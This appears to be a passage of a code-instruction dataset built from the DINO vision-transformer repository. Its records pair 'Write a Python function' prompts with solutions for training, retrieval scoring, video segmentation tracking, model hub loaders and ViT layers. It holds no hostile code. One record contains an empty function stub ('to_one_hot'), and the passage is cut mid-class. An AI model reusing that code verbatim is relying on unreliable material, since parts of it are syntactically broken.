    # ============ optionally resume training ... ============
    to_restore = {"epoch": 0}
    utils.restart_from_checkpoint(
        os.path.join(args.output_dir, "checkpoint.pth"),
        run_variables=to_restore,
        student=student,
        teacher=teacher,
        optimizer=optimizer,
        fp16_scaler=fp16_scaler,
        dino_loss=dino_loss,
    )
    start_epoch = to_restore["epoch"]

    start_time = time.time()
    print("Starting DINO training !")
    for epoch in range(start_epoch, args.epochs):
        data_loader.sampler.set_epoch(epoch)

        # ============ training one epoch of DINO ... ============
        train_stats = train_one_epoch(student, teacher, teacher_without_ddp, dino_loss,
            data_loader, optimizer, lr_schedule, wd_schedule, momentum_schedule,
            epoch, fp16_scaler, args)

        # ============ writing logs ... ============
        save_dict = {
            'student': student.state_dict(),
            'teacher': teacher.state_dict(),
            'optimizer': optimizer.state_dict(),
            'epoch': epoch + 1,
            'args': args,
            'dino_loss': dino_loss.state_dict(),
        }
        if fp16_scaler is not None:
            save_dict['fp16_scaler'] = fp16_scaler.state_dict()
        utils.save_on_master(save_dict, os.path.join(args.output_dir, 'checkpoint.pth'))
        if args.saveckp_freq and epoch % args.saveckp_freq == 0:
            utils.save_on_master(save_dict, os.path.join(args.output_dir, f'checkpoint{epoch:04}.pth'))
        log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},
                     'epoch': epoch}
        if utils.is_main_process():
            with (Path(args.output_dir) / "log.txt").open("a") as f:
                f.write(json.dumps(log_stats) + "\n")
    total_time = time.time() - start_time
    total_time_str = str(datetime.timedelta(seconds=int(total_time)))
    print('Training time {}'.format(total_time_str))
161,737 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
The provided code snippet includes necessary dependencies for implementing the `score_ap_from_ranks_1` function. Write a Python function `def score_ap_from_ranks_1(ranks, nres)` to solve the following problem:
Compute the average precision of one search. ranks = ordered list of ranks of true positives nres = total number of positives in dataset
Here is the function:
def score_ap_from_ranks_1(ranks, nres):
    """Compute the average precision of one search.

    ranks = ordered list of ranks of true positives
    nres = total number of positives in dataset
    """
    # Average precision as the area under the precision-recall curve,
    # accumulated as one trapezoid per true positive.
    recall_step = 1.0 / nres
    ap = 0.0
    for ntp, rank in enumerate(ranks):
        # precision just before retrieving this true positive
        # (ntp = true positives so far, rank = items retrieved so far)
        precision_left = 1.0 if rank == 0 else ntp / float(rank)
        # precision just after retrieving it (both counters advance by one)
        precision_right = (ntp + 1) / float(rank + 1)
        ap += 0.5 * (precision_left + precision_right) * recall_step
    return ap
161,738 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def is_image_file(s):
    """Return True if filename `s` ends with a recognized image extension.

    The check is case-insensitive (fix: the original compared the raw
    extension, so upper-case names such as 'photo.JPG' were rejected).
    A name without a dot is rejected, since its "extension" is the whole name.
    """
    ext = s.split(".")[-1].lower()
    return ext in {'jpg', 'jpeg', 'png', 'ppm', 'bmp', 'pgm', 'tif', 'tiff', 'webp'}
161,739 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
class ImgListDataset(torch.utils.data.Dataset):
    """Minimal dataset over an explicit list of image file paths.

    Each item is ``(image, index)`` where ``image`` is the RGB-converted PIL
    image (optionally transformed) and ``index`` is its position in the list.
    """

    def __init__(self, img_list, transform=None):
        self.samples = img_list
        self.transform = transform

    def __len__(self):
        return len(self.samples)

    def __getitem__(self, i):
        path = self.samples[i]
        with open(path, 'rb') as stream:
            image = Image.open(stream).convert('RGB')
        if self.transform is not None:
            image = self.transform(image)
        return image, i
def extract_features(image_list, model, args):
    """Extract a [CLS] + GeM-pooled patch-token descriptor for every image.

    Runs under torch.distributed: each rank processes its shard of
    ``image_list`` (via DistributedSampler); per-batch features are
    all-gathered and written into a single feature matrix held by rank 0.

    Args:
        image_list: list of image file paths.
        model: ViT exposing ``get_intermediate_layers`` and ``patch_embed``.
        args: needs ``imsize``, ``batch_size_per_gpu``, ``num_workers``,
            ``use_cuda``.

    Returns:
        (len(image_list), d) feature tensor on rank 0; None on all other ranks.
    """
    transform = pth_transforms.Compose([
        pth_transforms.Resize((args.imsize, args.imsize), interpolation=3),
        pth_transforms.ToTensor(),
        pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    ])
    tempdataset = ImgListDataset(image_list, transform=transform)
    data_loader = torch.utils.data.DataLoader(tempdataset, batch_size=args.batch_size_per_gpu,
                                              num_workers=args.num_workers, drop_last=False,
                                              sampler=torch.utils.data.DistributedSampler(tempdataset, shuffle=False))
    features = None
    for samples, index in utils.MetricLogger(delimiter=" ").log_every(data_loader, 10):
        samples, index = samples.cuda(non_blocking=True), index.cuda(non_blocking=True)
        feats = model.get_intermediate_layers(samples, n=1)[0].clone()

        cls_output_token = feats[:, 0, :]  # [CLS] token
        # GeM with exponent 4 for output patch tokens
        b, h, w, d = len(samples), int(samples.shape[-2] / model.patch_embed.patch_size), int(samples.shape[-1] / model.patch_embed.patch_size), feats.shape[-1]
        feats = feats[:, 1:, :].reshape(b, h, w, d)
        # clamp before pow(4) so the final pow(1/4) is numerically safe
        feats = feats.clamp(min=1e-6).permute(0, 3, 1, 2)
        feats = nn.functional.avg_pool2d(feats.pow(4), (h, w)).pow(1. / 4).reshape(b, -1)
        # concatenate [CLS] token and GeM pooled patch tokens
        feats = torch.cat((cls_output_token, feats), dim=1)

        # init storage feature matrix (lazily, once feature width is known)
        if dist.get_rank() == 0 and features is None:
            features = torch.zeros(len(data_loader.dataset), feats.shape[-1])
            if args.use_cuda:
                features = features.cuda(non_blocking=True)

        # get indexes from all processes
        y_all = torch.empty(dist.get_world_size(), index.size(0), dtype=index.dtype, device=index.device)
        y_l = list(y_all.unbind(0))
        y_all_reduce = torch.distributed.all_gather(y_l, index, async_op=True)
        y_all_reduce.wait()
        index_all = torch.cat(y_l)

        # share features between processes
        feats_all = torch.empty(dist.get_world_size(), feats.size(0), feats.size(1),
                                dtype=feats.dtype, device=feats.device)
        output_l = list(feats_all.unbind(0))
        output_all_reduce = torch.distributed.all_gather(output_l, feats, async_op=True)
        output_all_reduce.wait()

        # update storage feature matrix (scatter rows back by global index)
        if dist.get_rank() == 0:
            if args.use_cuda:
                features.index_copy_(0, index_all, torch.cat(output_l))
            else:
                features.index_copy_(0, index_all.cpu(), torch.cat(output_l).cpu())
    return features  # features is still None for every rank which is not 0 (main)
161,740 | import os
import glob
import sys
import argparse
import cv2
from tqdm import tqdm
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torchvision
from torchvision import transforms as pth_transforms
import numpy as np
from PIL import Image
import utils
import vision_transformer as vits
def parse_args():
    """Parse command-line options for the self-attention video generation script.

    Returns:
        argparse.Namespace: the parsed arguments (parsing happens here, so
        calling this twice re-reads sys.argv).
    """
    parser = argparse.ArgumentParser("Generation self-attention video")
    parser.add_argument(
        "--arch",
        default="vit_small",
        type=str,
        choices=["vit_tiny", "vit_small", "vit_base"],
        help="Architecture (support only ViT atm).",
    )
    parser.add_argument(
        "--patch_size", default=8, type=int, help="Patch resolution of the self.model."
    )
    parser.add_argument(
        "--pretrained_weights",
        default="",
        type=str,
        help="Path to pretrained weights to load.",
    )
    parser.add_argument(
        "--checkpoint_key",
        default="teacher",
        type=str,
        help='Key to use in the checkpoint (example: "teacher")',
    )
    parser.add_argument(
        "--input_path",
        required=True,
        type=str,
        help="""Path to a video file if you want to extract frames
            or to a folder of images already extracted by yourself.
            or to a folder of attention images.""",
    )
    parser.add_argument(
        "--output_path",
        default="./",
        type=str,
        help="""Path to store a folder of frames and / or a folder of attention images.
            and / or a final video. Default to current directory.""",
    )
    parser.add_argument(
        "--threshold",
        type=float,
        default=0.6,
        help="""We visualize masks
        obtained by thresholding the self-attention maps to keep xx percent of the mass.""",
    )
    parser.add_argument(
        "--resize",
        default=None,
        type=int,
        nargs="+",
        help="""Apply a resize transformation to input image(s). Use if OOM error.
        Usage (single or W H): --resize 512, --resize 720 1280""",
    )
    parser.add_argument(
        "--video_only",
        action="store_true",
        help="""Use this flag if you only want to generate a video and not all attention images.
            If used, --input_path must be set to the folder of attention images. Ex: ./attention/""",
    )
    parser.add_argument(
        "--fps",
        default=30.0,
        type=float,
        help="FPS of input / output video. Automatically set if you extract frames from a video.",
    )
    parser.add_argument(
        "--video_format",
        default="mp4",
        type=str,
        choices=["mp4", "avi"],
        help="Format of generated video (mp4 or avi).",
    )
    return parser.parse_args()
161,741 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def norm_mask(mask):
    """Min-max normalize each channel of `mask` to [0, 1], in place.

    Channels whose maximum is not strictly positive are left untouched.
    Returns the same (mutated) tensor for convenience.
    """
    n_channels = mask.size(0)
    for ch in range(n_channels):
        channel = mask[ch, :, :]
        if channel.max() > 0:
            shifted = channel - channel.min()
            mask[ch, :, :] = shifted / shifted.max()
    return mask
def label_propagation(args, model, frame_tar, list_frame_feats, list_segs, mask_neighborhood=None):
    """Propagate the segmentations of the context frames onto ``frame_tar``.

    Args:
        args: needs ``size_mask_neighborhood`` and ``topk``.
        model: feature extractor consumed by ``extract_feature``.
        frame_tar: target frame tensor (C, H, W).
        list_frame_feats: features of the context frames, each (dim, h*w).
        list_segs: segmentation maps of the context frames, each (1, C, h, w).
        mask_neighborhood: cached spatial-locality mask; built on first call
            and returned so the caller can reuse it.

    Returns:
        (seg_tar, return_feat_tar, mask_neighborhood): propagated segmentation
        (1, C, h, w), target-frame features (dim, h*w) for future reuse, and
        the (possibly newly created) neighborhood mask.
    """
    ## we only need to extract feature of the target frame
    feat_tar, h, w = extract_feature(model, frame_tar, return_h_w=True)

    return_feat_tar = feat_tar.T  # dim x h*w

    ncontext = len(list_frame_feats)
    feat_sources = torch.stack(list_frame_feats)  # nmb_context x dim x h*w

    # cosine-similarity affinities via normalized dot products, softened by temperature 0.1
    feat_tar = F.normalize(feat_tar, dim=1, p=2)
    feat_sources = F.normalize(feat_sources, dim=1, p=2)

    feat_tar = feat_tar.unsqueeze(0).repeat(ncontext, 1, 1)
    aff = torch.exp(torch.bmm(feat_tar, feat_sources) / 0.1)  # nmb_context x h*w (tar: query) x h*w (source: keys)

    if args.size_mask_neighborhood > 0:
        if mask_neighborhood is None:
            # restrict_neighborhood is defined elsewhere in this module;
            # it zeroes affinities outside a local spatial window
            mask_neighborhood = restrict_neighborhood(h, w)
            mask_neighborhood = mask_neighborhood.unsqueeze(0).repeat(ncontext, 1, 1)
        aff *= mask_neighborhood

    aff = aff.transpose(2, 1).reshape(-1, h * w)  # nmb_context*h*w (source: keys) x h*w (tar: queries)
    # keep only the top-k affinities per target location, then renormalize to sum 1
    tk_val, _ = torch.topk(aff, dim=0, k=args.topk)
    tk_val_min, _ = torch.min(tk_val, dim=0)
    aff[aff < tk_val_min] = 0

    aff = aff / torch.sum(aff, keepdim=True, axis=0)

    # weighted average of the context segmentations with the affinity weights
    list_segs = [s.cuda() for s in list_segs]
    segs = torch.cat(list_segs)
    nmb_context, C, h, w = segs.shape
    segs = segs.reshape(nmb_context, C, -1).transpose(2, 1).reshape(-1, C).T  # C x nmb_context*h*w
    seg_tar = torch.mm(segs, aff)
    seg_tar = seg_tar.reshape(1, C, h, w)
    return seg_tar, return_feat_tar, mask_neighborhood
def extract_feature(model, frame, return_h_w=False):
    """Extract the patch-token features of a single frame.

    Returns a (h*w, dim) tensor of patch tokens; when ``return_h_w`` is True,
    the token-grid height and width are returned as well.
    """
    patch = model.patch_embed.patch_size
    h = int(frame.shape[1] / patch)
    w = int(frame.shape[2] / patch)
    tokens = model.get_intermediate_layers(frame.unsqueeze(0).cuda(), n=1)[0]
    tokens = tokens[:, 1:, :]  # drop the [CLS] token, keep patch tokens only
    dim = tokens.shape[-1]
    feat = tokens[0].reshape(h * w, dim)
    if return_h_w:
        return feat, h, w
    return feat
def imwrite_indexed(filename, array, color_palette):
    """Save `array` as an indexed (palette) PNG, as used by DAVIS evaluation."""
    # Palette PNGs are inherently single-channel: refuse anything else.
    if np.atleast_3d(array).shape[2] != 1:
        raise Exception("Saving indexed PNGs requires 2D array.")
    indexed = Image.fromarray(array)
    indexed.putpalette(color_palette.ravel())
    indexed.save(filename, format='PNG')
def read_frame(frame_dir, scale_size=(480,)):
    """Read a single video frame from disk and preprocess it.

    Args:
        frame_dir: path to the frame image (read with OpenCV, i.e. BGR).
        scale_size: a single value (the shorter side is set to it and the
            longer side scaled proportionally, rounded down to a multiple
            of 64), or an explicit (height, width) pair.
            Fix: the default was a mutable list (`[480]`); a tuple avoids the
            shared-mutable-default pitfall without changing behavior.

    Returns:
        (img, ori_h, ori_w): normalized float tensor in CHW/RGB order, plus
        the original image height and width.
    """
    img = cv2.imread(frame_dir)
    ori_h, ori_w, _ = img.shape
    if len(scale_size) == 1:
        if(ori_h > ori_w):
            tw = scale_size[0]
            th = (tw * ori_h) / ori_w
            th = int((th // 64) * 64)
        else:
            th = scale_size[0]
            tw = (th * ori_w) / ori_h
            tw = int((tw // 64) * 64)
    else:
        th, tw = scale_size
    img = cv2.resize(img, (tw, th))
    img = img.astype(np.float32)
    img = img / 255.0
    img = img[:, :, ::-1]  # BGR (OpenCV) -> RGB
    img = np.transpose(img.copy(), (2, 0, 1))  # HWC -> CHW; copy() makes the reversed view contiguous
    img = torch.from_numpy(img).float()
    # NOTE(review): color_normalize is defined elsewhere in this module
    img = color_normalize(img)
    return img, ori_h, ori_w
The provided code snippet includes necessary dependencies for implementing the `eval_video_tracking_davis` function. Write a Python function `def eval_video_tracking_davis(args, model, frame_list, video_dir, first_seg, seg_ori, color_palette)` to solve the following problem:
Evaluate tracking on a video given first frame & segmentation
Here is the function:
def eval_video_tracking_davis(args, model, frame_list, video_dir, first_seg, seg_ori, color_palette):
    """
    Evaluate tracking on a video given first frame & segmentation.

    Propagates the first-frame segmentation through the whole clip via
    label_propagation and writes one indexed PNG per frame into
    args.output_dir/<video name>.
    """
    video_folder = os.path.join(args.output_dir, video_dir.split('/')[-1])
    os.makedirs(video_folder, exist_ok=True)
    # The queue stores the n preceding frames (feature, segmentation) pairs
    que = queue.Queue(args.n_last_frames)
    # first frame
    frame1, ori_h, ori_w = read_frame(frame_list[0])
    # extract first frame feature
    frame1_feat = extract_feature(model, frame1).T  # dim x h*w
    # saving first segmentation (ground truth, copied through unchanged)
    out_path = os.path.join(video_folder, "00000.png")
    imwrite_indexed(out_path, seg_ori, color_palette)
    # restricted-attention mask; built lazily on the first propagation step
    mask_neighborhood = None
    for cnt in tqdm(range(1, len(frame_list))):
        frame_tar = read_frame(frame_list[cnt])[0]
        # we use the first segmentation and the n previous ones as references
        used_frame_feats = [frame1_feat] + [pair[0] for pair in list(que.queue)]
        used_segs = [first_seg] + [pair[1] for pair in list(que.queue)]
        frame_tar_avg, feat_tar, mask_neighborhood = label_propagation(args, model, frame_tar, used_frame_feats, used_segs, mask_neighborhood)
        # pop out oldest frame if necessary
        if que.qsize() == args.n_last_frames:
            que.get()
        # push current results into queue
        seg = copy.deepcopy(frame_tar_avg)
        que.put([feat_tar, seg])
        # upsampling (patch grid -> pixel grid) & argmax over classes
        frame_tar_avg = F.interpolate(frame_tar_avg, scale_factor=args.patch_size, mode='bilinear', align_corners=False, recompute_scale_factor=False)[0]
        frame_tar_avg = norm_mask(frame_tar_avg)
        _, frame_tar_seg = torch.max(frame_tar_avg, dim=0)
        # saving to disk at the original resolution (nearest-neighbour, mode 0,
        # so label ids stay intact)
        frame_tar_seg = np.array(frame_tar_seg.squeeze().cpu(), dtype=np.uint8)
        frame_tar_seg = np.array(Image.fromarray(frame_tar_seg).resize((ori_w, ori_h), 0))
        frame_nm = frame_list[cnt].split('/')[-1].replace(".jpg", ".png")
        imwrite_indexed(os.path.join(video_folder, frame_nm), frame_tar_seg, color_palette)
161,742 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def read_frame_list(video_dir):
    """Return the paths of a video's JPEG frames in sorted order."""
    return sorted(glob.glob(os.path.join(video_dir, "*.jpg")))
161,743 | import os
import copy
import glob
import queue
from urllib.request import urlopen
import argparse
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
from torchvision import transforms
import utils
import vision_transformer as vits
def to_one_hot(y_tensor, n_dims=None):
def read_seg(seg_dir, factor, scale_size=[480]):
    """Load a segmentation PNG, downscale it by `factor`, and one-hot encode it.

    Returns a tuple (one_hot_small_seg, original_seg_array).
    """
    seg = Image.open(seg_dir)
    _w, _h = seg.size  # note PIL.Image.Image's size is (w, h)
    if len(scale_size) == 1:
        # Scale the short side to scale_size[0] and snap the long side down
        # to a multiple of 64 (same convention as read_frame).
        if(_w > _h):
            _th = scale_size[0]
            _tw = (_th * _w) / _h
            _tw = int((_tw // 64) * 64)
        else:
            _tw = scale_size[0]
            _th = (_tw * _h) / _w
            _th = int((_th // 64) * 64)
    else:
        # NOTE(review): scale_size is read here as (w, h), while read_frame
        # unpacks it as (th, tw) — confirm the intended argument order.
        _th = scale_size[1]
        _tw = scale_size[0]
    # Nearest-neighbour resize (resample mode 0) keeps label ids intact.
    small_seg = np.array(seg.resize((_tw // factor, _th // factor), 0))
    small_seg = torch.from_numpy(small_seg.copy()).contiguous().float().unsqueeze(0)
    return to_one_hot(small_seg), np.asarray(seg)
161,744 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vits16` function. Write a Python function `def dino_vits16(pretrained=True, **kwargs)` to solve the following problem:
ViT-Small/16x16 pre-trained with DINO. Achieves 74.5% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vits16(pretrained=True, **kwargs):
    """
    ViT-Small/16x16 pre-trained with DINO.
    Achieves 74.5% top-1 accuracy on ImageNet with k-NN classification.
    """
    # Build the headless backbone first; return it as-is for random init.
    net = vits.__dict__["vit_small"](patch_size=16, num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_deitsmall16_pretrain/dino_deitsmall16_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,745 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vits8` function. Write a Python function `def dino_vits8(pretrained=True, **kwargs)` to solve the following problem:
ViT-Small/8x8 pre-trained with DINO. Achieves 78.3% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vits8(pretrained=True, **kwargs):
    """
    ViT-Small/8x8 pre-trained with DINO.
    Achieves 78.3% top-1 accuracy on ImageNet with k-NN classification.
    """
    # Build the headless backbone first; return it as-is for random init.
    net = vits.__dict__["vit_small"](patch_size=8, num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_deitsmall8_pretrain/dino_deitsmall8_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,746 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vitb16` function. Write a Python function `def dino_vitb16(pretrained=True, **kwargs)` to solve the following problem:
ViT-Base/16x16 pre-trained with DINO. Achieves 76.1% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vitb16(pretrained=True, **kwargs):
    """
    ViT-Base/16x16 pre-trained with DINO.
    Achieves 76.1% top-1 accuracy on ImageNet with k-NN classification.
    """
    # Build the headless backbone first; return it as-is for random init.
    net = vits.__dict__["vit_base"](patch_size=16, num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_vitbase16_pretrain/dino_vitbase16_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,747 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_vitb8` function. Write a Python function `def dino_vitb8(pretrained=True, **kwargs)` to solve the following problem:
ViT-Base/8x8 pre-trained with DINO. Achieves 77.4% top-1 accuracy on ImageNet with k-NN classification.
Here is the function:
def dino_vitb8(pretrained=True, **kwargs):
    """
    ViT-Base/8x8 pre-trained with DINO.
    Achieves 77.4% top-1 accuracy on ImageNet with k-NN classification.
    """
    # Build the headless backbone first; return it as-is for random init.
    net = vits.__dict__["vit_base"](patch_size=8, num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,748 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_resnet50` function. Write a Python function `def dino_resnet50(pretrained=True, **kwargs)` to solve the following problem:
ResNet-50 pre-trained with DINO. Achieves 75.3% top-1 accuracy on ImageNet linear evaluation benchmark (requires to train `fc`).
Here is the function:
def dino_resnet50(pretrained=True, **kwargs):
    """
    ResNet-50 pre-trained with DINO.
    Achieves 75.3% top-1 accuracy on ImageNet linear evaluation benchmark (requires to train `fc`).
    """
    net = resnet50(pretrained=False, **kwargs)
    net.fc = torch.nn.Identity()  # expose backbone features, no classifier
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_resnet50_pretrain/dino_resnet50_pretrain.pth",
        map_location="cpu",
    )
    # strict=False: the DINO checkpoint carries no `fc` weights.
    net.load_state_dict(checkpoint, strict=False)
    return net
161,749 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_small_12_p16` function. Write a Python function `def dino_xcit_small_12_p16(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Small-12/16 pre-trained with DINO.
Here is the function:
def dino_xcit_small_12_p16(pretrained=True, **kwargs):
    """XCiT-Small-12/16 pre-trained with DINO."""
    # The architecture itself comes from the upstream XCiT hub repo.
    net = torch.hub.load('facebookresearch/xcit:main', "xcit_small_12_p16", num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_xcit_small_12_p16_pretrain/dino_xcit_small_12_p16_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,750 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_small_12_p8` function. Write a Python function `def dino_xcit_small_12_p8(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Small-12/8 pre-trained with DINO.
Here is the function:
def dino_xcit_small_12_p8(pretrained=True, **kwargs):
    """XCiT-Small-12/8 pre-trained with DINO."""
    # The architecture itself comes from the upstream XCiT hub repo.
    net = torch.hub.load('facebookresearch/xcit:main', "xcit_small_12_p8", num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_xcit_small_12_p8_pretrain/dino_xcit_small_12_p8_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,751 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_medium_24_p16` function. Write a Python function `def dino_xcit_medium_24_p16(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Medium-24/16 pre-trained with DINO.
Here is the function:
def dino_xcit_medium_24_p16(pretrained=True, **kwargs):
    """XCiT-Medium-24/16 pre-trained with DINO."""
    # The architecture itself comes from the upstream XCiT hub repo.
    net = torch.hub.load('facebookresearch/xcit:main', "xcit_medium_24_p16", num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_xcit_medium_24_p16_pretrain/dino_xcit_medium_24_p16_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,752 | import torch
from torchvision.models.resnet import resnet50
import vision_transformer as vits
The provided code snippet includes necessary dependencies for implementing the `dino_xcit_medium_24_p8` function. Write a Python function `def dino_xcit_medium_24_p8(pretrained=True, **kwargs)` to solve the following problem:
XCiT-Medium-24/8 pre-trained with DINO.
Here is the function:
def dino_xcit_medium_24_p8(pretrained=True, **kwargs):
    """XCiT-Medium-24/8 pre-trained with DINO."""
    # The architecture itself comes from the upstream XCiT hub repo.
    net = torch.hub.load('facebookresearch/xcit:main', "xcit_medium_24_p8", num_classes=0, **kwargs)
    if not pretrained:
        return net
    checkpoint = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/dino/dino_xcit_medium_24_p8_pretrain/dino_xcit_medium_24_p8_pretrain.pth",
        map_location="cpu",
    )
    net.load_state_dict(checkpoint, strict=True)
    return net
161,753 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
def drop_path(x, drop_prob: float = 0., training: bool = False):
    """Per-sample stochastic depth: randomly zero whole samples and rescale
    the survivors by 1/keep_prob. Identity at eval time or when drop_prob=0."""
    if not training or drop_prob == 0.:
        return x
    keep = 1 - drop_prob
    # One Bernoulli(keep) draw per sample, broadcast over the remaining dims.
    mask_shape = (x.shape[0],) + (1,) * (x.ndim - 1)
    mask = torch.rand(mask_shape, dtype=x.dtype, device=x.device).add_(keep).floor_()
    return x.div(keep) * mask
161,754 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
    """ Vision Transformer (ViT) backbone as used by DINO.

    Splits the image into patches, prepends a learnable [CLS] token, adds
    (possibly interpolated) positional embeddings, and applies `depth`
    transformer blocks. `forward` returns the final [CLS] embedding.
    """
    def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
                 num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
                 drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
        super().__init__()
        self.num_features = self.embed_dim = embed_dim
        self.patch_embed = PatchEmbed(
            img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
        num_patches = self.patch_embed.num_patches
        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
        self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
        self.pos_drop = nn.Dropout(p=drop_rate)
        # Per-block drop-path rates grow linearly with depth
        # (stochastic depth decay rule).
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]
        self.blocks = nn.ModuleList([
            Block(
                dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
                drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
            for i in range(depth)])
        self.norm = norm_layer(embed_dim)
        # Classifier head; Identity when num_classes == 0 (pure feature extractor).
        self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        trunc_normal_(self.pos_embed, std=.02)
        trunc_normal_(self.cls_token, std=.02)
        self.apply(self._init_weights)

    def _init_weights(self, m):
        # Truncated-normal init for linear weights; zeros/ones for LayerNorm.
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight, std=.02)
            if isinstance(m, nn.Linear) and m.bias is not None:
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.LayerNorm):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)

    def interpolate_pos_encoding(self, x, w, h):
        """Bicubically resample the patch position embeddings when the input
        resolution differs from the pre-training resolution."""
        npatch = x.shape[1] - 1
        N = self.pos_embed.shape[1] - 1
        if npatch == N and w == h:
            return self.pos_embed
        class_pos_embed = self.pos_embed[:, 0]
        patch_pos_embed = self.pos_embed[:, 1:]
        dim = x.shape[-1]
        w0 = w // self.patch_embed.patch_size
        h0 = h // self.patch_embed.patch_size
        # we add a small number to avoid floating point error in the interpolation
        # see discussion at https://github.com/facebookresearch/dino/issues/8
        w0, h0 = w0 + 0.1, h0 + 0.1
        patch_pos_embed = nn.functional.interpolate(
            patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
            scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
            mode='bicubic',
        )
        assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
        patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
